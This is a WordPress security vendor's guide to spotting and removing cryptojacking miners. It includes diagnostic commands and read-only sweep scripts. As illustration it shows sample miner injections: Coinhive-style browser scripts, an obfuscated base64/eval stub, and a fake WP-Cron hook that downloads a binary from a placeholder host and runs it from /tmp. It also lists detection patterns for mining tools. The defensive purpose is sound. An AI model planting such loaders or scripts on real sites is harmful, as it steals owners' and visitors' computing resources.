
How to Detect and Remove Cryptocurrency Miners from Your WordPress Site

February 3, 2026·WO Security Shield Team

Your WordPress site is suddenly slow. CPU usage has spiked. Your hosting bill went up. But there's no visible malware, no spam, no redirects. The cause? A cryptocurrency miner running silently in the background.

What is cryptojacking?

Cryptojacking is when attackers inject code into your website that uses your server's CPU (or your visitors' browsers) to mine cryptocurrency — typically Monero (XMR), which is designed for CPU mining.

There are two types:

Server-side miners

PHP scripts that run on your hosting server, consuming CPU cycles 24/7. These are the more damaging variant — they can:

  • Spike your hosting costs
  • Trigger resource limit suspensions
  • Degrade site performance for all visitors

Client-side miners

JavaScript injected into your pages that runs in your visitors' browsers. These use your visitors' CPU to mine while they browse your site.

<!-- Typical client-side miner injection -->
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('attacker-site-key');
  miner.start();
</script>

While the original Coinhive service shut down in 2019, dozens of copycats exist in 2026.

Signs your site has been cryptojacked

  1. Abnormally high CPU usage — Check your hosting control panel. If PHP processes are consistently at 80-100% CPU with no traffic spike, suspect mining
  2. Slow page loads — Server response times increase because CPU is saturated
  3. Hosting provider warnings — Many hosts send automated emails when CPU usage exceeds thresholds
  4. Unexpected PHP processes — Use top or htop on your server to find PHP processes consuming unusual resources
  5. Visitor complaints — For client-side miners, visitors may notice their fans spinning up or battery draining

Where miners hide

Server-side miners are typically found in:

  • /wp-content/uploads/ — disguised as image files with .php extensions
  • /wp-includes/ — modified core files with mining code appended
  • /tmp/ or /var/tmp/ — outside the web root but executed via cron jobs
  • Plugin directories — fake or abandoned plugins with mining payloads

Miners often use the same obfuscation techniques as other WordPress malware to avoid detection:

// Typical obfuscated server-side miner
$a = base64_decode('ZXZhbChnemluZmxhdGUo...');
@eval($a);
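
The hiding places listed above can be swept with a short read-only script. This is an added example, not part of WO Security Shield or the original post; the function names and the `sweep.sh` file name are assumptions, and the results are candidates for review rather than verdicts.

```bash
# Added example: read-only sweep of the hiding places listed above.
# Function names and the sample invocation are this example's own.

# PHP (or PHP-like) files under uploads; WordPress stores media there, not code.
find_php_in_uploads() {            # $1 = WordPress root
  find "$1/wp-content/uploads" -type f \
    \( -iname '*.php' -o -iname '*.php[0-9]' -o -iname '*.phtml' \
       -o -iname '*.phar' \) 2>/dev/null | sort
}

# PHP files that call both base64_decode() and eval(), even on separate
# lines as in the snippet above. Output is a review list: some legitimate
# code matches too.
find_eval_decoders() {             # $1 = directory to search
  grep -rlE --null --include='*.php' 'base64_decode[[:space:]]*\(' "$1" \
    2>/dev/null \
    | xargs -0 -r grep -lE '(^|[^[:alnum:]_])eval[[:space:]]*\(' 2>/dev/null \
    | sort
}

# Regular files in temp directories that start with the ELF magic bytes
# (0x7f 'E' 'L' 'F'), whatever their name or extension.
find_elf_in_tmp() {                # $@ = directories to check
  find "$@" -xdev -type f 2>/dev/null | while IFS= read -r f; do
    magic=$(head -c 4 "$f" 2>/dev/null | od -An -tx1 | tr -d ' \n')
    if [ "$magic" = "7f454c46" ]; then printf '%s\n' "$f"; fi
  done | sort
}

# Usage: sh sweep.sh /var/www/html
if [ -n "${1:-}" ]; then
  echo "== PHP in uploads ==";       find_php_in_uploads "$1"
  echo "== eval + base64_decode =="; find_eval_decoders "$1/wp-content"
  echo "== ELF in temp dirs ==";     find_elf_in_tmp /tmp /var/tmp /dev/shm
fi
```
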

Removal steps

1. Identify the mining processes

Check running processes on your server:

ps aux | grep -i php | sort -k3 -rn | head -20

2. Scan with WO Security Shield

Run a full integrity scan from your WO Security Shield dashboard. The scanner detects:

  • Known cryptomining signatures (XMRig, Coinhive variants, CryptoLoot)
  • Obfuscated eval/base64 patterns common in mining payloads
  • Unauthorised files in WordPress core directories
  • Modified core files with appended code

3. Remove infected files

Delete any files flagged as cryptominers. For modified core files, use the "Reinstall WordPress Core" button in the findings panel — this replaces all core files with clean copies from WordPress.org.

4. Check cron jobs

Attackers often schedule mining scripts to restart via cron:

crontab -l

Remove any entries you don't recognise, especially those executing PHP files or downloading remote scripts.

5. Find the entry point

The miner didn't install itself. Common entry points:

  • Vulnerable plugins (check for known CVEs)
  • Weak admin passwords (check login logs) — see our guide on stopping brute-force attacks
  • File upload vulnerabilities — attackers may have planted PHP backdoors
  • Compromised FTP credentials

Cryptojacking is profitable because it's silent. Attackers prefer it over visible hacks precisely because sites stay infected longer. Regular scans with WO Security Shield catch miners before they cost you money.

How Cryptojacking Works on WordPress Sites

Cryptocurrency mining malware on WordPress sites comes in two forms:

Server-Side Miners

These run directly on your web server, using your CPU and memory to mine cryptocurrency:

// Disguised as a WordPress cron job
if (!wp_next_scheduled('wp_system_maintenance')) {
    wp_schedule_event(time(), 'hourly', 'wp_system_maintenance');
}
add_action('wp_system_maintenance', function() {
    // Downloads and executes a mining binary
    $bin = file_get_contents('https://cdn.example.com/libsystem.so');
    file_put_contents('/tmp/.system-cache', $bin);
    exec('chmod +x /tmp/.system-cache && /tmp/.system-cache &');
});

Symptoms: Consistently high CPU usage (80-100%), slow page loads, increased hosting costs, hosting provider warnings about resource abuse.

Client-Side Miners (Browser-Based)

These inject JavaScript that mines cryptocurrency using your visitors' browsers:

<!-- Injected into your theme's footer or a compromised plugin -->
<script src="https://cdn.example.com/lib/worker.min.js"></script>
<script>
  var miner = new CoinMiner.Anonymous('attacker-wallet-id');
  miner.start({threads: 2, throttle: 0.3});
</script>

Symptoms: Visitors complain about slow browsers, laptop fans spinning up, increased bounce rate, mobile visitors experiencing battery drain.

Detection Methods

Check Server Resource Usage

# Check for suspicious processes
top -bn1 | head -20

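# Look for mining processes (common binary names)
# Note: real kernel workers appear in brackets, e.g. [kworker/0:1]; a "kworker" with a file path or owned by the web user is the one to investigate
ps aux | grep -E '(xmrig|minerd|cryptonight|stratum|kworker)' | grep -v grep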

# Check for suspicious cron jobs
crontab -l
ls -la /etc/cron.d/

# Find recently modified PHP files that might be the loader
find /var/www/html -name "*.php" -mtime -7 -exec grep -l "exec\|system\|passthru" {} \;

Check for Injected JavaScript

# Search for known mining scripts
grep -rl "coinhive\|cryptoloot\|coin-hive\|CoinMiner\|minero\.cc" /var/www/html/

# Search for suspicious obfuscated scripts
grep -rl "String.fromCharCode.*eval" /var/www/html/wp-content/

# Check database for injected scripts in posts/pages
wp db query "SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%<script%miner%'" --allow-root

Monitor Network Connections

# Check for connections to mining pools (established TCP connections on common pool ports)
netstat -tnp | grep -E ':(3333|4444|5555|7777|8888|9999)'

# Watch active connections
ss -tp | grep -v 'localhost'

Removal Steps

  1. Kill the mining process: kill -9 [PID] for any suspicious process
  2. Remove the loader script — delete the PHP file that downloads/executes the miner
  3. Clean injected JavaScript — remove mining scripts from theme files and database
  4. Remove scheduled tasks — check WordPress cron (the cron option in wp_options) and system crontab
  5. Delete downloaded binaries — check /tmp/, /var/tmp/, and /dev/shm/ for suspicious executables
  6. Patch the entry point — update the vulnerable plugin or theme that was exploited
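
For the scheduled-task checks (the "Check cron jobs" step and step 4 above), the two filters below triage WP-Cron hooks and crontab lines. This is an added example, not the scanner's own code: `CORE_HOOKS` is an allow-list assumed here and may be incomplete, both function names are hypothetical, and the hook list is expected from WP-CLI's `wp cron event list --field=hook`.

```bash
# Added example: cron triage. CORE_HOOKS and both function names are this
# example's own; extend CORE_HOOKS with hooks your plugins really schedule.

# Hooks scheduled by WordPress core itself (allow-list, may be incomplete).
CORE_HOOKS=' wp_version_check wp_update_plugins wp_update_themes
 wp_scheduled_delete wp_scheduled_auto_draft_delete delete_expired_transients
 wp_privacy_delete_old_export_files recovery_mode_clean_expired_keys
 wp_site_health_scheduled_check wp_https_detection wp_update_user_counts
 wp_delete_temp_updater_backups '

# stdin: one WP-Cron hook per line, e.g. `wp cron event list --field=hook`
# stdout: hooks not on the allow-list, such as wp_system_maintenance above.
unknown_cron_hooks() {
  allowed=" $(printf '%s' "$CORE_HOOKS" | tr '\n' ' ') "
  sort -u | while IFS= read -r hook; do
    [ -n "$hook" ] || continue
    case "$allowed" in
      *" $hook "*) ;;                      # core hook, skip
      *) printf '%s\n' "$hook" ;;          # unknown hook, report
    esac
  done
}

# stdin: crontab text (crontab -l, /etc/cron.d/*). stdout: active lines that
# run PHP, fetch remote content, pipe into a shell, or touch temp directories.
suspicious_cron_lines() {
  grep -vE '^[[:space:]]*(#|$)' | grep -E \
'(curl|wget)[[:space:]]|(^|[[:space:]/])php[0-9.]*[[:space:]]|\.php([[:space:]]|$)|/(tmp|var/tmp|dev/shm)/|\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Usage:
#   wp cron event list --field=hook | unknown_cron_hooks
#   crontab -l | suspicious_cron_lines
```

A legitimate `wp-cron.php` entry also matches the crontab filter, and plugins register their own hooks, so treat both outputs as lists to review.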
